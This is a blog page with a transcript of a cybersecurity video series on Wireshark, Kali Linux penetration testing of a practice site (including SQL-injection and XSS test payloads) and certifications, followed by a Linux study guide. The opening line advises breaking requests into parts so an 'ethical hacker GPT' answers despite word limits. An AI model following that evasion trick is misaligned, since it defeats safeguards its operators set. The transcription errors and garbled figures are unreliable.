it into parts and ask the ethical hacker GPT and he will respond to you as it has some limitations of some words and some of the responses so you could ask him in the breaking parts and he will respond to you do you know friends that Wireshark is a powerful network protocol analyzer that helps you capture and analyze network traffic in real time it allows you to deep dive into data packets traveling through your network giving you insights into network performance security and troubleshooting in this tutorial we’ll guide you through the basics of using Bioshark from setting up your capture environment to interpreting the data by the end of this tutorial you’ll have a solid understanding of how to navigate Yshark interface set of filters and analyze the network traffic for different use cases so guys let’s get started so guys let us start first by understanding what is Wireshark so guys Vireshark is a comprehensive open-source network protocol analyzer that basically allows user to capture and analyze the data traveling over the network in real time it is widely used by network administrators security professionals and also developers for various purposes for example guys like network troubleshooting where you have to identify and resolve network issues by examining the traffic patterns and diagnosing the connectivity problems the next one is network analysis which we’ll also be doing in our hands-on where you have to understand and optimize network performance by analyzing data flows and interaction between network systems the third one is security auditing you will also have to detect and investigate unusual or potentially malicious network activities such as unauthorized access or data breaches and finally you have a protocol development where you can debug and develop network protocols by capturing and analyzing protocol messages and behaviors the key features of Wireshark are the first one is packet capture wireshark captures packets of data transmitted over the network each packet contains a wealth of information including source and destination addresses and also you get protocol types and payload data so as you can see all over here I’ve already downloaded via shark and I’ll guide you also how to download it but as you can see these are the lines that shows that the Wi-Fi packet you know graph is showing that this is how the packets are transmitting so this is basically the realtime analysis what you can get through in wireshark next one is you get a detailed inspection guys wireshark also decodes and displays data at various protocol layers example you can get Ethernet IP TCP HTTP which allows for detailed examinations of network communications you can also perform filtering and searching then you’ll also get a chance to do data visualization which includes features for visualizing network graphics such as flow graphs as you can see all over here and also statistics which can helps in understanding network behavior and performance wireshark is available for multi-operating systems like for Windows Mac OS Linux and many more now there are certain scenarios where network security engineers use it suppose for network performance monitoring where you track and analyze the performance of network applications and services you also get an incident response you investigate and respond to network security incidents by analyzing capture traffic and you also do the protocol analysis where you examine and troubleshoot network protocols and ensure proper implementation now let us start with the wireshark so first let us download the wireshark and before we download it I expect that you would have got some brief idea regarding what is wireshark now what you have to do guys you have to go at this link wireshark oorgg.d download.html so since I’m using windows so I have clicked on windows x64 installer just right click on this so as you can see it will start downloading so guys since I’ve already downloaded it I may not have to do it again and the steps are very simple just you have to click yes yes and it’s going to download all the required dependencies and your installer will be ready and after clicking all the okays you are going to get something like this so this is your entry of the wireshark network analyzer now so as you can see all over here you can capture the network packets from these interfaces so you can see local area connection 10 adapter lookup traffic capture Bluetooth is there then you have the Ethernets okay so let us choose the Wi-Fi as a network interface okay and just click on this so as you can see all over here so many of the packets have started running up okay and this is a shark icon so basically it is uh doing the real time packet capturing where you have all these things so now let us try to understand what is there in wireshark so you can see you have file basically for managing files you have open save export okay so these kind of options are there you can also export the TLS session keys okay you can export the objects and uh you can do print quit then here in the edit so edit you can modify the preferences settings and profiles if you talk about view you can adjust the layout all over here or wireshark if you talk about go you can navigate through the packets all over here then here is a capture you can start or stop all over here you can restart it then next is analyze so as you can see all over here you have display filters display filter macros display filter expressions and many more okay similarly you have statistics okay which helps in viewing network statistics and data summaries here you have telephoneony for using these kind of protocols okay then you have wireless okay then you have tools all over here firewall ACL rules MAC address okay and there you have the help icon so this is a very basic outview of this application now let us do some basic exercises first so let us try to capture a traffic first okay so since I’ve already selected uh our network interface as Wi-Fi and let us restart it so you can just go on capture and just start the restart okay so this has started now go to your browser and just type say http okay and say bin og is a file so guys this is a basic website that we have requested on our browser and let us go to our wireshark and stop this for a moment so as you can see all over here this icon shows applying a display filter now go all over here and type the filter say http okay and you can say our filtering would be done so as you can see here you have the source you have the destination here you have the time here you have the number here you have the length of the packets okay and this is the info okay so now let us do the general analysis of the wireshark output so as you can see all over here the first one is HTTP request and responses so as you can see this is our source okay we are sending a request to the destination address with [Music] 44.219.81.240 the protocol is HTTP and the length of the packet is 480 and it is basically a get request okay so get HTTP/1.1 now there’s a reply from this destination all over here and to the destination at our source the protocol is still HTTP now the length of the packet is increased is 887 and what we are getting guys all over here that the status is 200 and it says okay now as you can see what we are getting basically an HTML file all over here okay now similarly we are again requesting and we are getting a JSON file all over here now getting a specific JSON HTTP 1.1 and similarly reply is coming so as you can see it’s a two and fro motion where we are requesting to a destination which is the browser with the protocol HTTP and similarly we are getting a reply from our destination so guys this is our device and this is the given uh resource we are trying to access on our browser so basically now we can see these are the content types which is text HTML for the HTML structure okay and also you can see all over here this is a JSON type okay and uh these are the type of the content we are trying to access it okay and this is the uh request what we have uh done to our uh destination which is the browser okay with the bin og and it is returning a text html file i hope so guys you would have got a brief idea like how you can do the general analysis of the wireshark output now let us try to do one more example which will make our concepts more clear now guys I will show you one more use case of this that you can diagnose the network issues with ping and trace command okay so with the help of wireshark this can also be done guys so what you need next is you can open a terminal okay and just right click all over here and now in this what we are going to do guys we are going to generate an ICMP traffic so with the help of ping command okay so now what we do we type ping say google.com and you can see all over here the request and reply have started and now what we will do guys we will use the tracer command for tracing our packet flow so so you can see something we have got all over here we will discuss about this bit later now let us open our wireshark okay and what we’ll do guys we will type ICMP okay and just click all over here okay so guys go to the filter and type ICMP okay and just click all over here and but before that you have to stop this and now let us try so you can see all over here that here the destination is showing unreachable but here we are getting the reply okay now let us try to examine this protocol okay so what all over here let us try to understand first what we did in the terminal okay so guys when we are typing the command ping google.com this command is basically testing the reachability of google.com by sending the internet control message protocol or ICMP echore request packets and waiting for the replies which is echo response now guys let us break down the ping results so first three replies we are going to see that each reply shows the IP address of 142.250.1 2550.1 93.110 which is one of the Google servers and you can see the roundtrip time latency for the packets for the first time it is showing around 76 milliseconds for second round trip time it is showing around 88 then third is 99 and fourth one is 30 mconds now you can see uh there is something called time to live also and in this case the time to live for each packet is around 55 millconds Okay so basically this field indicates how many hops or routers the packet can pass through before being discarded okay now you can also see the request timeout so the fourth packet is a request timeout meaning no reply was received within this set time and you can also see the ping statistics so you can say here sent four packets received four packets and there is no loss okay so this is one thing and also approximate round trip in milliseconds you can see minimum is 30 milliseconds and maximum is 99 millconds average is calculated 73 milliseconds so this is statistics what we got now you can see all over here we have the trace command okay so here no arguments are provided first so let us try to understand the d means do not resolve IP address to host names okay where h means maximum number of hops of routers to search and w means timeout in milliseconds for each reply so suppose if I see tracer google.com so guys this will show all the hops that the packet has to travel through reach the Google server which will help to diagnose where the delays or issues might occur on the path now you can see all over here there are lot of options are given so similarly you can read this now let us try to do the wireshark analysis so you can see all over here with our source 10.101.5.118 and we are sending the request to the Google server and this is internet control message protocol so you can see all over here this is eco this is a ping request with ID 0x001 and we can see the sequence is also given the time to live and we are replying in 7641 millconds so this packet is basically what we are doing guys we are 7630 is our packet number and this is what we are sending as a request then 7641 is a reply from the Google server with the given ID okay the sequence number of this and the time to live and it is also giving the request one now what you can do guys you can also apply one filter all over here we can okay now with the help of this you can just see there are a lot of options as a filtering okay so you can read the documentation for this and whenever it is turning red guys it is showing something as error okay and now uh let us do this and let us type our IP address say 101 1 okay 1 dot 5.118 okay so this is also one of the way you can apply the filter okay so it’s going to filter out the IP address okay say let’s do this so it is going to filter out our IP address which is basically the same which is sending because we have not given any other ping requests so guys here what we can see so this is kind of of the analysis what we are doing basically okay so guys this was a wireshark analysis for diagnosing the network issues with the help of ping and trace commands and you can do lot more other things with the help of wireshark basically these tools are used by network administrators hackers and also network engineers to understand the network performance diagnose the network issues okay so this was a short exercise which I have shown you about the basics of wireshark i hope so you would have enjoyed our today’s video imagine being able to assess a security of a systems like a pro hacker but ethically of course in this tutorial we are going to walk you down through how to perform penetration testing using Kali Linux which is one of the most powerful tools in the cyber security world whether you are a beginner or a tech enthusiast you’re going to learn the basics of pentesting with essential tools in Kali Linux and how to identify vulnerabilities in your network by the end of this video you’re going to have a strong foundation on how to start your ethical hacking journey so first let us try to understand what exactly is penetration testing penetration testing or pen testing is a simulated cyber attack which is conducted by ethical hackers to evaluate the security of a system application or even a network the goal here is to uncover vulnerabilities weak points that attackers could exploit and provide actionable recommendations to secure the systems unlike regular vulnerability assessments penetration testing goes a step bit further by actively exploiting the vulnerabilities to understand their impact now you would be wondering why do we do penetration testing so penetration testing serves several critical purposes first of all like identifying the weaknesses so you could just write over here okay now let us discuss about this point so even the most secure systems have vulnerabilities and these can stem from outdated software misconfiguration or even a human error now penetration testing uncovers these weaknesses before they are exploited suppose I’ll give you an example uh you have a web application that uses an outdated version of a PHP a penetration test could reveal that this version has known vulnerability allowing remote code execution okay so for this purpose you could use penetration testing the second point is testing incident response a penetration test doesn’t just highlight vulnerabilities but it also assesses how your systems and team respond to simulated attacks this helps their organizations identify gaps in their incident response plans suppose during a test a ethical hacker deploys ransomware the security team speeds and efficiency in detecting the containing the attack determine their readiness for the real incident so for the incident response testing you could use penetration testing now the third point could be meeting the compliance standards industries like healthcare finance and e-commerce must comply with stringent data protection regulations so penetration testing helps meet standards such as PCIDSS GDPR or HIPPA okay so I’ll just mention all over here fine now the fourth reason which I could think of could be protecting the reputation a breach can damage customers trust and tarnish your brand image penetration testing is a proactive way to safeguard your reputation for example a major retail chain suffers a data breach exposing millions of customer records post incident analysis reveals that a simple penetration test could have identified the vulnerability and prevented the breach now let us discuss about types of penetration testing so penetration tests can be categorized based on their scope and the level of information shared with the tester on the basis of that I have mentioned three of the penetration testing types the first one is blackbox testing so here the tester has no prior knowledge of the system this simulates an attack by an external hacker so that is called a blackbox testing now if I discuss about white box testing here the tester has full access to the system including source code architecture details etc so this simulates an insider attack or a highly informed hacker the third one that we have all over here is gray box testing so here the tester has partial knowledge such as user credential or limited architecture details based on this he simulates the attack so you could do these kind of penetration testing on a system to check its vulnerability now let’s do a hands-on exercise on penetration testing with Kali Linux now if you have not installed Kali Linux so just go to the official documentation or official website of Kali Linux so here you could see you’ll get a tab called get Kali okay just uh you could go for virtual machine way of installation uh you could go through installing the image okay so there are various ways you could do it but if you’re using Windows operating system so what you could do just go directly to your Microsoft Edge okay so here it is going to have Kali Linux just type on okay so you could see this app is there and you could install this directly so you could see I have installed it directly so let us open the terminal okay and the process of installation is very very simple now on Kali Linux you have to install some additional tools to perform penetration testing so now let us try to set up the tools okay so you can see all over here I have opened my Kal Linux terminal now the tools that we are going to install all over here will be N mapap ho dig nectto WP scan open bus and metasloit let me give you a brief idea about these tools so N map also stands for network mapper so the purpose of this tool is going to be scanning the network to identify open ports services and operating system you could also scan the target for open ports and also the running services next tool will be who is now who is is going to provide you domain registration details and ownership information like for example who is and you could give a name like certain uh example.com could be a you know demo website so which will help you to gather domain level information about the target now the third tool is dig so Dick performs the DNS enumeration to receive the DNS records like for example A MX NS okay so all of these are DNS records basically so this tool is very much important if you are you know uh you know we will be needing some DNS record to do the penetration testing so basically it is used to explore the DNS structure of the targeted domain now the fourth tool is going to be Nikto so Nikto is going to scan web servers for vulnerabilities such as outdated software default configuration and potential misconfigurations now it is also going to check for vulnerabilities on the web server also the fifth tool is WP scan now if I talk about this so this basically scans the WordPress websites for vulnerabilities in themes plugins and core files okay now it enumerates the users and checks for plug-in vulnerabilities so WP scan requires an API token which can be obtained from this website so type wpu lndb.com so you could uh get it all from here okay so this is certain additional requirement now let us talk about the next tool that we have is openvas now if I talk about openvas or greenbone vulnerability manager so this provides a comprehensive vulnerability management system okay so basically it performs scans to detect vulnerabilities across the target finally we have the metas-ploit if I talk about metas-ploit then it is basically used to exploit development and execution for identified vulnerabilities now before updating it you have to type certain thing like this sudoapp update okay so after you have done this then you could just type sudo apt install n mapap now since I’ve already installed n mapap okay so I don’t need to do it but you could do it with this command so now let us check the version of n mapap for that purpose you could type n mapap and type version so you could see I have 7.94 version okay and this is official documentation of n mapap if you want more information about this tool you could refer this documentation the next tool is who is same thing we have to do pseudoapp update okay now next thing would be suda app install who is okay so we have installed who is also next tool will be dig so just install dig like this so you could install dig something like this so app install DNS utils okay so we have installed dig also and to check the version type dig vi so you would get the version as 9.2 okay finally let us install nectto so same command for here type necto since I’ve already installed necto so I don’t need to do it now let us check the version of it necto so you could see I have version of nikto all over here now fifth tool will be WP scan so same thing so you could see it has installed WP scan also now after installing register at uh you know WP scan and copied the generated you know API token so guys as you can see all over here on your WP scan/profile you’re going to get an API token now guys let’s move ahead so guys you can check the version of WP scan after you know typing wpcan/ version and you could see I have version 3.8.27 installed now let us install openvos so for installing openvos type sudo app install and then type openvas so you can see all over here that our installation is in progress and it is installing this tool so guys you can see all over here we have installed this tool so so guys next step is installing metasloit so type sudo app install metasloit framework now since I’ve already installed this so I need not need to do it but you can type this command and you could download it okay so there is one error in this okay now it’s fine now let us check the

    version of it so type MSF console and next would be version so you can see I have 6.4.34 version now we have installed all these tools and check the version also now let us proceed for penetration testing okay guys so we’ll be using this uh demo website to do the pent penetration testing so you could get the link all over here so it is a juicehop.herokuapp.com okay I will mention it in the link so you could access this website to learn how to do penetration testing but one word of advice before you are doing uh penetration testing for any other application uh just get a written permission of it without uh their permission you cannot do the penetration testing of any official website so because the idea is uh hacking ethically okay so unethical practices is not permissible now let us open our Kal Linux okay so here we are going to open the end map and we are going to run a scan on this website the same website which we have opened which is httpjushop.hoku.com heroku.com so just copy the link okay so type nm mapap ss a and give the name of the given website and so you could see now it has started scanning so basically this is going to reveal the open ports services and possibly underlying technology of the web application so guys it might take some time just wait for a few moments so guys you could see all over here that N map has given the complete scan okay so you could see the stats all over here so port 80 and it is using a TCP protocol okay and state is open it is uh so port 80 is basically open all over here and the service is HTTP okay and the version is cowboy so we have got this brief idea regarding this that uh for open port on HTTP it is 80 now let us identify the web server use all over here so you could see all over here the server is Heroku router and uh so we have got all the information of this website we have got the open port so the overall idea was to look for the open vote okay now let us do the vulnerability assessment of this so for doing the vulnerability assessment we’ll be using necto so type nicto /h and the name copy the link now in this we are going to look for misconfiguration or outdated server version or exposed directory and files so you could see we have got uh the target host name the target port okay and uh you could see the SSL info is also given all over here okay and uh so you could see all over here it is telling that the site uses TLS and the strict transport security header is not defined all over here so in similar way still uh is looking for the vulnerability okay let us uh give it some time so guys you could see all over here that Nikto has given a lot of vulnerability assessment so let us try to look at first okay now you could see it has also told that server is using wild card certificate okay if you want a brief idea about it just click on this link then uh you could also see all over here that uh it is giving all the information what could be you know vulnerable so now it is giving some backup certificate file found so if you move down a little bit so you could also see that Xc content type header is also not set so here it is telling that it could allow a user agent to render the content of the site in different fashion so this can be a mime type attack can be done on this website so guys you can see all over here that it is also given robots.txt so this is actually a plain text file which is located in the root directory of the website for example juice entry.com/roots.txt the primary purpose is to instruct web crawlers such as search engine bots or like who are interacting with the website it can release sensitive information making it significant for both web security and SEO perspective so guys you could see all over here we could manually check for robots.txt file so give the link of the given website for which you’re doing the pen testing and give / robots.txt now you could see in the output it’s given user agent star disallow FTP now what is user agent so this is a directive which applies to all the web crawlers and the bots so asterisk is a wild card meaning it is intended for every bot that visits this website example it could be a Google bot or bingeb etc now what is it is disallowing so disallowing it is this directory is telling that bots not to crawl on the index of the FTP directory of the website okay so bots should keep uh you know they should skip this FTP and avoid listing its content in the search engine however this does not restrict manual access by the users or attackers like who can directly visit the / FTP URL in their browser or they could use a tool like curl so what is the significance of these configuration like for example with the web crawlers search engines and bots will respect this directive and avoid the crawling of the /tp directory it is helping optimize the crawling by excluding unnecessary sensitive path for the security perspective the presence of /fttp in rewards.txt can be a security risk because it is revealing the existence of potentially sensitive directory attackers may manually navigate to the /tp to check for files or vulnerabilities third if we talk about with the respect of penetration testing the FTP entry can serve as a clue for ethical hackers or penetration testers to investigate okay so you can check the / FTP directory for sensitive files like backups configurations or credentials okay now if you want to look for the hidden files so you could use tools like DB okay so you could go for the directory you know enumeration for the same just type db give the link and /tp so you might be able to access some hidden directories under / FTP so I hope so you would have got a brief idea regarding / FTP and do check for these files in a given uh website it’s very very important process of penetration testing now let us finally proceed for the SQL injection so guys SQL injection is a technique which is used to manipulate a website database by injecting malicious SQL code into the input field so the steps involve are as follows so first of all go to the login page so you could see account all over here go click on login now here enter the following user credentials like you could give for username as say 1 okay or you could give any password or you could leave it blank okay now you could see all over here that we have injected a payload 1 equals to 1 or something like this okay so it you can see all over here that I’m not able to login okay so you could see this is been secured now let us give certain other email and let us say provide a password or we could leave it blank so it’s still asking for your password type anything okay uh just login you can see it is telling invalid email or password okay means like we have not registered yet all over here that’s why it’s saying invalid email so let let me explain you what I’m trying to do all over here so suppose the payload which I’m trying to inject suppose as I have written all over here say 1= to 1 okay now this is actually breaking the SQL query logic for example If you are typing select star from users where username equals to this or 1 equals to 1 minus minus and password could be anything okay so this or condition always evaluates true so let me show you so guys you could see here that I’m writing a SQL query something like this okay select star from users where username equals can be anything or it could be 1 equals to minus one and password could be anything so this is kind of a SQL injection where we are trying to put anything malacious inside the you know given code so this or condition 1 equals to 1 always evaluates to true so it is bypassing the authentication so the minus minus sign is used to comment out the rest of the SQL query ignoring the password checks okay now if you successfully log in without valid credentials then you could say the application is vulnerable to SQL injection but you can see all over here that this condition is not happening okay and if you even try to leave out the password it is not showing anything for login so this is actually not vulnerable to SQL injection now let us try to do cross-ite scripting so guys cross-sight scripting or XSS is an attack that injects malicious script into the website which are then executed in the browser of unsuspecting users so the steps to test XSS first you have to identify the input fields okay search bar it could be or a feedback form like on this website and you could enter a payload certain thing like this so first of all let us try to go all over here in the search bar click on inspect okay now we have to find out where the script is written okay so type Ctrl+ F okay so Okay now the script uh Okay now what you would do all over here let us now perform the excss attack so as we have navigated to our web application so we have targeted this input field okay now we are trying to inject okay script alert XSS okay so what you have to do you have to click on right click on this and go to the developers tool okay and then you will uh get screen like this where you have to add script alert accesses now if the alert box pops up okay if it does then it shows that it is vulnerable to the XSS attack so guys as you can see all over here I have inserted this script alert XSS /cript so I’m trying to inject the XSS now if you see a pop-up button like coming all over here then it indicates that this input field is vulnerable to XSS attack so just right click on this and let us see so guys as you can see all over here that I have inserted this script alert accesss now when you right click on this and any pop-up is coming up then it means that this website is vulnerable to excss attack so in this way you can perform exploitation now if you cannot manually insert the tag okay what you can do guys you can modify the existing DOM okay so first of all locate the input field in the developers tool then right click on it and on that input element okay and manually replace the given values press enter to save the changes and check if the script executes so let us right click on this so you can see nothing is happening so it’s all fine now that’s one way you could do it or alternatively what you could do you could go on the console and type the same thing like document.query selector input matt input zero so this is the given form field and the value and inject the excss attack all over here and then if it is applicable trigger the search button programmatically so what you could do you could uh trigger in the next step document.query selector form.submit now if the green if the pop-up appears all over here then we are successfully injecting the XSS attack now if you can’t inject the script okay so this also scenario comes up so first of all inspect the sanitization logic review how the application processes your input some apps escape dangerous characters like these curly braces okay these braces and script so test alternative input fields try other input fields forms or query parameters where your script might work so guys this was a small introduction on pen testing with using various tools present in the Kali Linux cyber security is not just a job it’s a war zone where organizations fight daily to protect their most valuable assets data and systems the stakes have never been higher and the demand for skilled professionals is rapidly growing a trusted survey predicts that millions of cyber security job openings in India alone by next year but here’s the harsh reality most candidates lack the skills and the industry demands this is where certifications comes in you have probably heard people ask why do certifications why not just get a degree wait let me tell you the truth college programs often fail to keep up with the fast changing demands of cyber security industry certifications on the other hand are laser focused on the skills you actually need they are faster more affordable and targeted so whether you’re a fresher or a professional looking to climb up the ladder certifications are your best bet let’s explore the top five certifications that can give you an edge to help you land that dream cyber security job now you might be thinking I’m not from an IT background can certifications really help me or maybe you have graduated with a computer science degree and are wondering why bother with certifications let me explain why certifications are so powerful first if you are from a nonIT background certifications can open doors you never thought possible they provide you with hands-on practical skills that employers value far more than theoretical knowledge for example even if you have never written a single line of code certifications like comt plus security or certified ethical hacker can teach you the foundational skills needed to land your first job in cyber security on the other hand if you’re already a computer science graduate certifications allow you to specialize cyber security is a vast field and employers look for specialists in areas like penetration testing risk management or compliance a certification like CISSP can turn your general degree into a targeted resume that screams expertise here’s why certifications are such a game changer at first it will help you to boost your resume by adding instant credibility showing you have invested in gaining expertise they also align with industry trends ensuring your skills match with current standards they also demonstrate your commitment to your career and give you a competitive edge making you stand out to hiring managers in a crowded job market so now let us explore the top five certifications that you can take your cyber security career to the next level so let’s get started so now let’s begin with our very first certification at the top of the list which is certified information system security professional CISSB widely regarded as the gold standard in cyber security certification it’s offered by IANS it is one of the most respected organizations in this field this certification is very essential for professionals who want to lead cyber security efforts at an enterprise level well CISSP is an comprehensive certification that covers eight key cyber security domains such as risk management security operations and software development security it’s highly designed for experienced professionals and proves you have the expertise to design implement and also manage a rubber cyber security program organizations worldwide trust CISSP certified professionals to handle sensitive security needs talking about the eligibility to qualify you need to at least have five years of professional experience in at least two of the A domains a bachelor’s degree in computer science or any one of the experiences preferred even without full experience you can take the exam and earn the title associate while you complete the required work experience let’s talk about the exam details and cost well the CISSP exam is about six hours long with 250 questions and the cost of the exam is rupees 61,49 Indian rupees and for us it’s around $749 this is one of the fee to register and sit for the certification exam cissp opens doors to senior roles such as chief information security officer who can earn around 76 lakhs year in India and $150,000 plus per year in the US also senior security consultant who can earn around 13 lakhs per year in India and $120,000 per year in the United States well CISSP is more than just a credential it’s a symbol of expertise leadership and trust in the cyber security world for anyone serious about advancing in this field this is the certification you should aim for also if you’re looking for specialized training to a CISSP examination consider simply learn CISSP certification training this is globally acclaimed program and is aligned with the latest IC exam pattern offering comprehensive coverage of all the A domains with live online classes hands-on lab and also expert guidance with features like simulation tools test papers and included CISSP exam voucher simplearn ensures you are exam ready plus their 100% money back exam pass guarantee also adds extra confidence as you work towards elevating your cyber security credit next on our list is CISA which is certified information system auditor a highly respected certification from ISCA focusing on auditing compliance and risk management it’s perfect for professionals responsible for evaluating and improving an organization security framework cisa is recognized worldwide especially in highly regulated industries like finance healthcare and government it demonstrates expertise in identifying vulnerabilities ensuring compliance and improving security controls let’s talk about the eligibility for this certification well to qualify you need to have at least 5 years of work experience in IT audit control or security you also need to have a bachelor’s degree that can wave up to 2 years of this requirement let’s talk about the exam details and cost with this certification well the exam is 4 hours long with 150 questions testing your knowledge of auditing and compliance exam fee is around $47,141 Indian rupees and $575 for a CA members and if you’re not a member of ISACA then you have to pay $62,000 in Indian rupees and $760 for USA let’s talk about the career opportunities and salaries well CISA certified professionals can secure roles like IT audit manager who can earn around 20 lakhs per year in India and $130,000 per year in the United States compliance program manager also can earn around 24 lakhs per year in India and $140,000 per year in the United States with organization increasingly prioritizing governance and compliance CISA has become a critical certification for professionals in these areas it’s must have for those who want to specialize in auditing and risk management also if you want to boost your career in IT auditing and compliance you can consider simply learn CIS certification training as an accredited training partner of ISACA Simple Learn offers comprehensive preparation including live classes by industry experts access to the official ISACA learning kit and simulation test to help you master the 2024 CIS exam alone this training provides you upto-ate curriculum and practical insights to help you excel your career with an exam pass guarantee and flexible learning options simply learn also ensures that you’re fully prepared to achieve CISA certification and advance your professional journey let’s talk about the third certification on the list which is certified information security manager CISM coming at number three this is another certification from IACCA aimed at managers and leaders in cyber security it’s ideal for professionals who want to transition into leadership roles cism focuses on the strategic and managerial aspects of cyber security such as governance incident management and program development it’s valued by organization seeking security leaders who can make informed highle decision let’s talk about the eligibility to qualify you need to have five years of experience in information security management a degree of another relevant certification that can wave up to 2 years of this requirement let’s talk about the exam details and the cost well the exam is 4 hours long with 150 question assessing your strategic thinking and the cost is 47,000 rupees and $575,000 in United States for ISCA members and 62,000 rupees in per Indian currency and for non-members it is around $760,000 cism certified professionals often step into leadership roles such as director of information security who can earn around 37 lakh per year in India and 160,000 per year dollars in the United States data governance manager can earn around 30 lakhs per year in India and $140,000 per year in the United States for those aiming to lead cyber security teams and make strategic decisions CISM provides the credibility and expertise needed to succeed also if you want to elevate your career and leadership role Simple Learn CISM certification training can be your ideal choice as an ICA elite training partner Simplearn provides an learning kit including the IC value review manual QA and exam voucher along with live classes conducted by increders so you can refer to this uh certification by simply learn let’s move on to the fourth number on the list which we have comp eia security plus the perfect entry-level certification for building core cyber security skills it’s a vendor neutral which means it’s recognized across industries and applies to various technologies security plus covers essential topics like network security threat management and compliance it’s designed to give beginners a strong foundation in cyber security and prepare them for real world challenges let’s talk about the eligibility well there are no strict prerequisites but coma recommends having basic IT experience or earning the network plus certification first let’s talk about the exam details and cost the 90-minute exam includes both multiplechoice questions and also performancebased questions the registration fee for the exam is $30,000 rupees and in USD it is around $370 with security plus you can pursue roles like security engineer who can earn around 8.2 lakhs per year in India and $95,000 per year in the United States cloud engineers can earn up to rupees six lakh per year in India and $85,000 per year in the United States security plus is an affordable impactful way to start your cyber security journey making it an excellent choice for beginners also if you’re looking to begin your cyber security career with confidence consider simply learn TI security plus certification training this will also provide you comprehensive coverage of all the exam objectives and focuses on real world applications to prepare you for the industry challenges additionally flexible learning options and 247 assistance makes it an excellent choice for learners worldwide finally we have C which is certified ethical hacker on the list the perfect certification for those who dream of thinking to become a hacker to protect systems offered by EC council this credential focuses on skills needed to become penetration testing and ethical hacking c is a hands-on certification that teaches you to identify vulnerabilities and detect attacks and secure systems it’s a great choice for professionals drawn to ethical hacking and proactive cyber security moving on to the eligibility part to qualify you need to have two years of experience in information security or at least completion of the EC council’s official training program the exam details and the cost is the exam is around 4 hours long with 145 multiple choice questions and the exam fee is 98,000 and $1,199 USD in USD ca certified professionals often work as penetration tester who can earn around average of five lakh per year in India and $85,000 per year in the United States cyber security engineers can earn $7.3 lakh per year in India and $100,000 in the United States c is perfect for professionals who want to specialize in offensive security and ethical hacking it’s an exciting certification that paves the way for dynamic high impact tools also if you are ready to step into the world of ethical hacking then Simply Learn CE V13 certification training is the perfect choice accredited by the AC Council this course includes the official E course where AIdriven tools and exam voucher with hands-on labs live sessions and cutting edge tools simple learn equips you to excel in penetration testing and many more that’s our wonderful course if you have any doubts or question ask them in the comment section below our team of experts will reply you as soon as possible thank you and keep learning with Simply Learn staying ahead in your career requires continuous learning and upskilling whether you’re a student aiming to learn today’s top skills or a working professional looking to advance your career we’ve got you covered explore our impressive catalog of certification programs in cuttingedge domains including data science cloud computing cyber security AI machine learning or digital marketing designed in collaboration with leading universities and top corporations and delivered by industry experts choose any of our programs and set yourself on the path to career success click the link in the description to know more hi there if you like this video subscribe to the SimplyLearn YouTube channel and click here to watch similar videos to nerd up and get certified click here

    By Amjad Izhar
    Contact: amjad.izhar@gmail.com
    https://amjadizhar.blog

  • Linux Terminal Mastery: Commands, Shells, and File Systems

    Linux Terminal Mastery: Commands, Shells, and File Systems

    This text is a transcript of a Linux crash course aimed at beginners. The course, offered by Amigo’s Code, covers the fundamentals of the Linux operating system, including its history, features, and various distributions. It guides users through setting up a Linux environment on Windows and macOS using tools like UTM and VirtualBox. The curriculum further explores essential Linux concepts like file systems, user management, and commands, including the use of the terminal. The course then introduces Bash scripting, covering variables, conditionals, loops, functions, and the creation of automated scripts. The goal of the course is to equip learners with the skills necessary to effectively use Linux for software development, DevOps, or system administration roles.

    Linux Crash Course Study Guide

    Quiz

    1. What is Linux and who developed it?

    Linux is a powerful and flexible operating system developed by Linus Torvalds in 1991. Unlike operating systems such as Windows and macOS, Linux is open source and allows developers around the world to contribute and customize.

    2. What are the key features of Linux that make it a preferred choice for servers?

    The key features are stability, security, the ability to be customized to specific needs, and performance. Due to these factors, servers worldwide often prefer Linux.

    3. What is a Linux distribution? Name three popular distributions.

    A Linux distribution is a specific version or flavor of the Linux operating system tailored for different purposes. Three popular distributions are Ubuntu, Fedora, and Debian.

    4. Explain what UTM is and why it’s used in the context of the course.

    UTM is an application that allows users to securely run operating systems, including Linux distributions like Ubuntu, on macOS. It’s used in the course to demonstrate how to set up and run Linux on a Mac.

    5. What is VirtualBox and how is it used for Windows users in the course?

    VirtualBox is a virtualization software that allows Windows users to install and run other operating systems, including Linux distributions like Ubuntu, within a virtual environment.

    6. What is the difference between a terminal and a shell?

    A terminal is a text-based interface where users type commands and view output. A shell is a program that interprets and executes those commands, acting as an intermediary between the user and the operating system.

    7. What is Zsh, and why is it used in this course?

    Zsh (Z shell) is an extended version of the Bourne shell, known for its advanced features like auto-completion, spelling correction, and plugin support. It is used in the course to provide a more customizable and efficient command-line experience.

    8. What is Oh My Zsh, and what does it offer?

    Oh My Zsh is an open-source framework for managing Zsh configuration. It includes numerous helpful functions, helpers, plugins, and themes to enhance the Zsh experience.

    9. Explain the command sudo apt update. What does it do?

    sudo apt update updates the package index files on the system. These files contain information about available packages and their versions. The sudo ensures the command is executed with administrative privileges.

    10. What is a Linux command and what are its three main parts?

    A Linux command is a text instruction that tells the operating system what action to perform. The three main parts are the command itself, options (or flags) which modify the command’s behavior, and arguments, which specify the target or input for the command.

    Quiz Answer Key

    1. What is Linux and who developed it?

    Linux is a powerful and flexible operating system developed by Linus Torvalds in 1991. It’s open-source and allows for worldwide contributions.

    2. What are the key features of Linux that make it a preferred choice for servers?

    Key features include stability, security, customizability, and performance, making it ideal for servers.

    3. What is a Linux distribution? Name three popular distributions.

    A Linux distribution is a specific version of Linux. Ubuntu, Fedora, and Debian are examples.

    4. Explain what UTM is and why it’s used in the context of the course.

    UTM lets macOS users run other operating systems, including Ubuntu. The course uses it to set up Linux on a Mac.

    5. What is VirtualBox and how is it used for Windows users in the course?

    VirtualBox is a virtualization software. It allows Windows users to run Linux within a virtual environment.

    6. What is the difference between a terminal and a shell?

    A terminal is the interface for typing commands. The shell interprets and executes these commands.

    7. What is Zsh, and why is it used in this course?

    Zsh is an improved shell with features like auto-completion. The course uses it for a better command-line experience.

    8. What is Oh My Zsh, and what does it offer?

    Oh My Zsh is a framework for managing Zsh configuration. It provides themes and plugins to customize the shell.

    9. Explain the command sudo apt update. What does it do?

    sudo apt update updates package lists, requiring administrative privileges through sudo.

    10. What is a Linux command and what are its three main parts?

    A Linux command is a text instruction to the OS. It consists of the command, options, and arguments.

    Essay Questions

    1. Discuss the advantages of using Linux as a server operating system compared to Windows Server. Consider factors such as cost, security, and customization.
    2. Explain the significance of open-source development in the context of Linux. How does the collaborative nature of its development benefit the Linux community and users?
    3. Compare and contrast the roles of the terminal and the shell in a Linux environment. How do they interact to enable users to control the operating system?
